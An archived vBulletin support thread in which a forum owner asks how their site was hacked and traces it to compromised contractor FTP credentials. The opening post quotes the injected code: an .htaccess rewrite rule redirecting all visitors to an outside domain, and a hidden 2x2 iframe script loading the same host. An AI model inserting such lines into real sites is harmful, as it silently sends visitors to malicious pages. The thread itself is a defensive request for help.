The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#1
|
|||
|
|||
Looking to dig deeper into how forum was hacked
Hey,
for a second time, our forum has been hacked. The following happens:
The .htaccess file included this new line: Code:
RewriteRule ^.*$ http://senior-fun-shooters.de/mccd.html?h=XXX [L,R] Code:
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://senior-fun-shooters.de/mccd.html?j=XXX></iframe>');
This is the second time this has happened, so I suspect there's a known hack allowing these changes to be made. It could be a server permissions problem on our side too. Do you have any pointers for where this hack is already discussed? |
#2
|
|||
|
|||
Are you on dedicated or shared hosting? Sounds like the hosting environment is not secure...
|
#3
|
|||
|
|||
It is on our virtual private server, so we do control the permissions (that's not to say that our permissions are all set correctly...)
|
#4
|
|||
|
|||
Why don't you start with posting permissions for the directories and also the hosting environment's OS, current security modules installed etc
|
#5
|
|||
|
|||
Permissions for the form folder itself, and its subfolders is `drwxr-xr-x`.
It's running on Cent OS Linux. As it's a managed server, I don't have specifics on current securty modules installed. Is what I mentioned a known security hack? You are still of the mind that this could be prevented by correct folder permissions, am I right? |
#6
|
||||
|
||||
Have you checked your server logs to find the IP of the person who did this? Then check your access_logs for that IP and see what they did on your site.
|
#7
|
|||
|
|||
Do what Lynne said also. Access and server logs will tell you how and what happened. Most website vulnerabilities are due to the host not setting up a secure environment....
|
#8
|
|||
|
|||
Thanks for all the advice.
Our Apache logs certainly show the time the 404 responses begun to spring up. However, there does not seem to be more access information than that. I could be wrong, of course, and we'll search the help of an expert in the area of Linux. |
#9
|
|||
|
|||
I can confirm that this hack took place through FTP access.
That means it was not a mal-configured server or vBulletin's fault. How the strong FTP password was cracked is another question. It was an account created specfically for a past vBulletin contractor. Either the password was brute-force guessed (which I don't suspect), or the contractor's machine or FTP communication with our server was compromised. |
#10
|
|||
|
|||
Lock down FTP access to allow access from only known, trusted IP addresses through your firewall. You should be able to do that through your server control panel.
And actually on a running site that isn't being updated for any reason, there's no reason to allow any FTP access to the server at all. |
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|